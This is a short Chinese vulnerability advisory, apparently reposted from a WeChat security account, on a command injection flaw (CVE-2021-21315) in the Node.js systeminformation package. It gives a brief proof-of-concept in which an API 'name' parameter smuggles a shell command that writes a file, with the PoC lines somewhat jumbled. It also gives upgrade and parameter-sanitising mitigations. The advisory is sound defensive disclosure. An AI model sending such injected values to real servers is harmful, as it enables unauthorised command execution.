Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315)攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。
POC:
[ ]
['Sekurak' > pwn.txt) ]/api/getServices?name=$(echo -e
['Sekurak' > pwn.txt) ]/api/getServices?name[]=$(echo -e
目前该漏洞已经修复,将systeminformation及时升级到5.3.1或更高版本。
https://www.npmjs.com/package/systeminformation
缓解措施
如果无法升级,可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数,只允许使用string,拒绝任何数组。
本文始发于微信公众号(Khan安全攻防实验室):Node.js命令注入漏洞(CVE-2021-21315-POC)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论